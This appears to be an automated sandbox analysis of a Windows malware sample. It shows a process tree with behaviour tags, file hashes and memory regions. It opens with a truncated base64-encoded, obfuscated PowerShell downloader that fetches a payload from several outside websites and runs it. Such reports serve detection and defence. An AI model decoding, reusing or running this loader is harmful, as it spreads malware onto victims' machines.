GoAJwApACkAKwAnAGoAawAnACsAKAAnAGcAUwAnACsAJwAgAFsAXQAgACcAKwAnAFsAJwApACsAKAAnAF0AdwB3AHAAJwArACcALQAnACsAJwBhAGQAbQAnACkAKwAoACcAaQBuACcAKwAnAF0AJwApACsAKAAoACcAWwAgADEAKQAgACcAKwAnAGoAagAnACkAKQArACcAawAnACsAKAAnAGcAUwAgAFsAJwArACcAXQAgACcAKQArACgAJwBbACcAKwAnAF0AdwBTACcAKQArACgAJwBwAHEAXQAnACsAJwBbACAAMQAnACkAKwAoACgAJwApACAAJwApACkAKwAnAGoAJwArACcAagBrACcAKwAoACcAZwBTACAAWwBdACAAWwBdACcAKwAnAHcAJwArACcAQABoAHQAdAAnACkAKwAnAHAAJwArACcAcwA6ACcAKwAnAF0AJwArACgAKAAnAFsAIAAnACsAJwAxACkAIABqACcAKwAnAGoAawBnAFMAIAAnACkAKQArACcAWwBdACcAKwAnACAAJwArACgAJwBbACcAKwAnAF0AdwBdACcAKQArACcAWwAnACsAJwAgADEAJwArACgAKAAnACkAIAAnACkAKQArACcAagBqACcAKwAoACcAawBnAFMAIABbAF0AIABbACcAKwAnAF0AdwB3AHcAdwAnACsAJwAuAGYAJwApACsAJwByACcAKwAoACcAYQBqAGEAbQBvAG0AJwArACcAYQBkACcAKwAnAHIAaQAnACsAJwBkAC4AYwAnACsAJwBvAG0AJwApACsAKAAnAF0AJwArACcAWwAgADEAJwApACsAKAAoACcAKQAgAGoAJwArACcAagAnACkAKQArACcAawBnACcAKwAnAFMAIAAnACsAKAAnAFsAXQAgAFsAJwArACcAXQB3ACcAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAoACcAYwBvAG4AdAAnACsAJwBlACcAKQArACgAJwBuAHQAJwArACcAXQAnACkAKwAnAFsAIAAnACsAJwAxACcAKwAoACgAJwApACcAKwAnACAAagAnACkAKQArACgAJwBqAGsAJwArACcAZwAnACkAKwAnAFMAJwArACgAJwAgAFsAJwArACcAXQAnACkAKwAoACcAIAAnACsAJwBbAF0AdwBnAF0AJwApACsAKAAoACcAWwAgADEAKQAnACsAJwAgAGoAJwArACcAagBrAGcAJwApACkAKwAnAFMAIAAnACsAKAAnAFsAXQAnACsAJwAgACcAKQArACgAJwBbACcAKwAnAF0AdwBAAGgAJwApACsAJwB0AHQAJwArACgAKAAnAHAAJwArACcAcwA6ACcAKwAnAF0AWwAgADEAJwArACcAKQAgACcAKwAnAGoAagBrACcAKwAnAGcAUwAgAFsAXQAgACcAKQApACsAKAAnAFsAXQB3AF0AWwAnACsAJwAgACcAKQArACgAKAAnADEAKQAnACsAJwAgACcAKQApACsAKAAnAGoAagBrAGcAJwArACcAUwAgAFsAJwArACcAXQAnACkAKwAnACAAWwAnACsAJwBdAHcAJwArACgAJwBwACcAKwAnAGUAcwBxAHUAaQAnACkAKwAoACcAcwAnACsAJwBhAGMAJwApACsAJwByAGUAJwArACcAZAAnACsAKAAoACcALgAnACsAJwBjAG8AbQBdAFsAIAAxACkAIABqAGoAJwArACcAawAnACkAKQArACcAZwAnACsAJwBTACAAJwArACcAWwBdACcAKwAoACcAIABbAF0AdwAnACsAJwB2AG0AdwAnACkAKwAoACcAYQByACcAKwAnAGUALQB1AG4AbAAnACkAKwAoACcAbwBjAGsAJwArACcAZQAnACkAKwAoACcAcgAnACsAJwBdAFsAIAAxACcAKQArACgAKAAnACkAIAAnACkAKQArACgAJwBqACcAKwAnAGoAawAnACkAKwAnAGcAJwArACgAJwBTACAAWwAnACsAJwBdACAAJwApACsAKAAnAFsAJwArACcAXQB3ACcAKQArACcAZABhACcAKwAnAEMAJwArACcAXQAnACsAJwBbACcAKwAoACgAJwAgACcAKwAnADEAKQAgACcAKwAnAGoAagAnACkAKQArACgAJwBrAGcAJwArACcAUwAnACkAKwAnACAAJwArACgAJwBbAF0AJwArACcAIAAnACkAKwAnAFsAXQAnACsAJwB3ACcAKwAnAEAAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAcwA6ACcAKwAnAF0AWwAnACsAKAAoACcAIAAxACkAJwArACcAIAAnACkAKQArACcAagAnACsAJwBqACcAKwAoACcAawAnACsAJwBnAFMAJwApACsAKAAnACAAWwAnACsAJwBdACcAKQArACgAJwAgAFsAJwArACcAXQAnACkAKwAoACcAdwBdAFsAIAAnACsAJwAxACcAKQArACcAKQAnACsAJwAgACcAKwAoACcAagBqACcAKwAnAGsAZwBTACAAJwApACsAJwBbACcAKwAoACcAXQAnACsAJwAgAFsAXQB3AG0AZQAnACkAKwAnAGQAJwArACgAJwBoACcAKwAnAGUAbQAnACkAKwAoACgAJwBwAGYAYQAnACsAJwByAG0ALgBjACcAKwAnAG8AbQBdACcAKwAnAFsAIAAxACkAJwApACkAKwAnACAAJwArACgAJwBqAGoAJwArACcAawBnACcAKQArACgAJwBTACcAKwAnACAAWwBdACAAWwAnACkAKwAoACcAXQB3AHcAcAAnACsAJwAtAGEAJwApACsAJwBkAG0AJwArACgAJwBpAG4AJwArACcAXQAnACkAKwAnAFsAJwArACcAIAAnACsAJwAxACcAKwAoACgAJwApACAAagBqAGsAZwBTACAAWwAnACsAJwBdACcAKwAnACAAWwBdAHcAJwArACcATAAnACkAKQArACcAYgAnACsAKAAoACcAXQBbACAAMQAnACsAJwApACAAagBqACcAKQApACsAKAAnAGsAJwArACcAZwBTACcAKwAnACAAWwBdACcAKQArACcAIAAnACsAJwBbAF0AJwArACcAdwAnACsAJwBAAGgAJwArACgAJwB0ACcAKwAnAHQAcAA6AF0AWwAgADEAJwApACsAJwApACcAKwAoACcAIABqACcAKwAnAGoAawBnAFMAIABbAF0AJwArACcAIAAnACkAKwAnAFsAJwArACgAJwBdAHcAXQAnACsAJwBbACcAKQArACgAKAAnACAAMQAnACsAJwApACcAKQApACsAKAAnACAAJwArACcAagBqACcAKQArACgAJwBrAGcAJwArACcAUwAgAFsAXQAnACsAJwAgAFsAXQAnACkAKwAnAHcAJwArACgAJwBpAGUAbgAnACsAJwBnACcAKQArACgAJwBsAGkAJwArACcAcwBoAGEAJwApACsAJwBiAGMAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtAF0AWwAnACsAJwAgADEAKQAnACsAJwAgAGoAJwApACkAKwAoACcAagBrACcAKwAnAGcAUwAnACkAKwAoACgAJwAgACcAKwAnAFsAXQAnACsAJwAgAFsAJwArACcAXQB3AGMAJwArACcAbwB3AF0AWwAgADEAJwArACcAKQAgACcAKQApACsAJwBqAGoAJwArACcAawAnACsAKAAnAGcAUwAnACsAJwAgACcAKQArACcAWwAnACsAJwBdACcAKwAoACcAIAAnACsAJwBbAF0AJwApACsAKAAnAHcAMgBCACcAKwAnAEIAJwApACsAKAAoACcAXQBbACAAJwArACcAMQApACcAKQApACsAJwAgACcAKwAnAGoAJwArACgAJwBqAGsAJwArACcAZwAnACkAKwAoACcAUwAgACcAKwAnAFsAXQAgACcAKQArACcAWwBdACcAKwAnAHcAJwApACkALgAiAFIAYABlAHAAYABsAGEAYwBFACIAKAAoACgAJwBdAFsAJwArACgAKAAnACAAJwArACcAMQApACAAagBqAGsAZwAnACsAJwBTACAAWwBdACcAKQApACsAJwAgACcAKwAoACcAWwBdACcAKwAnAHcAJwApACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcALwAnACkALAAoACcAeAAnACsAJwB3AGUAJwApACkAWwAwAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQATwBkADcAYwBjAHcAOQAgACsAIAAkAFMAOQA1AGMAegAzADQAIAArACAAJABPAG4ANQA1AGwAagBnACkAOwAkAFEAOQBlAGMAYwBjADUAPQAoACgAJwBGACcAKwAnAG8ANAAnACkAKwAnAGcAJwArACgAJwAyACcAKwAnAHIAawAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwA3AG0AXwBiAHMAaAAgAGkAbgAgACQAQgBvAGkAZQBwADAAMQApAHsAdAByAHkAewAkAFEANABiADEAZwA1AG4ALgAiAGQAYABvAFcAbgBMAGAATwBhAGAARABmAEkAbABFACIAKAAkAFMANwBtAF8AYgBzAGgALAAgACQARwBsAGsAdgBmADcAYgApADsAJABFADQAZgBrAHQAZQBhAD0AKAAnAEQAJwArACcAbABpACcAKwAoACcAMAAnACsAJwA0AG4AXwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGwAawB2AGYANwBiACkALgAiAGwAYABlAGAATgBnAHQAaAAiACAALQBnAGUAIAA0ADcAOQAxADIAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAJwB3AGkAJwArACgAJwBuACcAKwAnADMAMgAnACkAKwAnAF8AUAAnACsAKAAnAHIAJwArACcAbwBjAGUAcwBzACcAKQApACkALgAiAEMAUgBgAGUAYABBAHQARQAiACgAJABHAGwAawB2AGYANwBiACkAOwAkAEsAbABtAG0AbABjAHIAPQAoACgAJwBWADYAegAnACsAJwA0ADMAJwArACcAcQAnACkAKwAnAGQAJwApADsAYgByAGUAYQBrADsAJABNAHkAcwBlADgAcAB0AD0AKAAnAFMAOAAnACsAKAAnADIANgA2AGoAJwArACcANwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAB3AG4AZgA5AGIANQA9ACgAJwBSAF8AJwArACgAJwAxAGsAbAAnACsAJwB3ACcAKQArACcAbwAnACkA1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exeC:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\hcproviders\fundisc.exe"C:\Windows\SysWOW64\hcproviders\fundisc.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exeMD5
6c8446c6c6519fd68f7fc06306ea417d
SHA115379fdbf33bd59204d4fb40c3039c0365bc91be
SHA256dfe3495d1a454c24e8c5e120e64e952e0f696478356ba5a874c1baf20c78f531
SHA512cf111c6f13d898ca77f938824e8ec20d9d3f5f34481bb6ed7096adad0c4ed5dae21906a22748687dfcabe6241808df7408b9080f552511d7bde79fa38226be82
-
C:\Users\Admin\Pjq6t3_\Jvnk7yk\N1pjur3u.exeMD5
6c8446c6c6519fd68f7fc06306ea417d
SHA115379fdbf33bd59204d4fb40c3039c0365bc91be
SHA256dfe3495d1a454c24e8c5e120e64e952e0f696478356ba5a874c1baf20c78f531
SHA512cf111c6f13d898ca77f938824e8ec20d9d3f5f34481bb6ed7096adad0c4ed5dae21906a22748687dfcabe6241808df7408b9080f552511d7bde79fa38226be82
-
C:\Windows\SysWOW64\hcproviders\fundisc.exeMD5
6c8446c6c6519fd68f7fc06306ea417d
SHA115379fdbf33bd59204d4fb40c3039c0365bc91be
SHA256dfe3495d1a454c24e8c5e120e64e952e0f696478356ba5a874c1baf20c78f531
SHA512cf111c6f13d898ca77f938824e8ec20d9d3f5f34481bb6ed7096adad0c4ed5dae21906a22748687dfcabe6241808df7408b9080f552511d7bde79fa38226be82
-
\Windows\SysWOW64\hcproviders\fundisc.exeMD5
6c8446c6c6519fd68f7fc06306ea417d
SHA115379fdbf33bd59204d4fb40c3039c0365bc91be
SHA256dfe3495d1a454c24e8c5e120e64e952e0f696478356ba5a874c1baf20c78f531
SHA512cf111c6f13d898ca77f938824e8ec20d9d3f5f34481bb6ed7096adad0c4ed5dae21906a22748687dfcabe6241808df7408b9080f552511d7bde79fa38226be82
-
\Windows\SysWOW64\hcproviders\fundisc.exeMD5
6c8446c6c6519fd68f7fc06306ea417d
SHA115379fdbf33bd59204d4fb40c3039c0365bc91be
SHA256dfe3495d1a454c24e8c5e120e64e952e0f696478356ba5a874c1baf20c78f531
SHA512cf111c6f13d898ca77f938824e8ec20d9d3f5f34481bb6ed7096adad0c4ed5dae21906a22748687dfcabe6241808df7408b9080f552511d7bde79fa38226be82
-
memory/608-5-0x0000000002610000-0x0000000002611000-memory.dmpFilesize
4KB
-
memory/608-4-0x000007FEF5540000-0x000007FEF5F2C000-memory.dmpFilesize
9.9MB
-
memory/608-7-0x000000001A8E0000-0x000000001A8E1000-memory.dmpFilesize
4KB
-
memory/608-8-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/608-9-0x000000001C390000-0x000000001C391000-memory.dmpFilesize
4KB
-
memory/608-10-0x000000001C420000-0x000000001C421000-memory.dmpFilesize
4KB
-
memory/608-6-0x000000001AC60000-0x000000001AC61000-memory.dmpFilesize
4KB
-
memory/800-18-0x0000000000000000-mapping.dmp
-
memory/800-21-0x0000000001F10000-0x0000000001F6A000-memory.dmpFilesize
360KB
-
memory/800-20-0x0000000001EB0000-0x0000000001F0B000-memory.dmpFilesize
364KB
-
memory/848-0-0x000000000088E000-0x000000000088F000-memory.dmpFilesize
4KB
-
memory/848-3-0x000000000088F000-0x0000000000893000-memory.dmpFilesize
16KB
-
memory/848-2-0x000000000088F000-0x0000000000893000-memory.dmpFilesize
16KB
-
memory/848-1-0x0000000006370000-0x0000000006374000-memory.dmpFilesize
16KB
-
memory/1740-13-0x0000000002280000-0x00000000022DB000-memory.dmpFilesize
364KB
-
memory/1740-14-0x00000000022E0000-0x000000000233A000-memory.dmpFilesize
360KB
-
memory/1904-22-0x000007FEF7850000-0x000007FEF7ACA000-memory.dmpFilesize
2.5MB
-
memory/1956-11-0x0000000000000000-mapping.dmp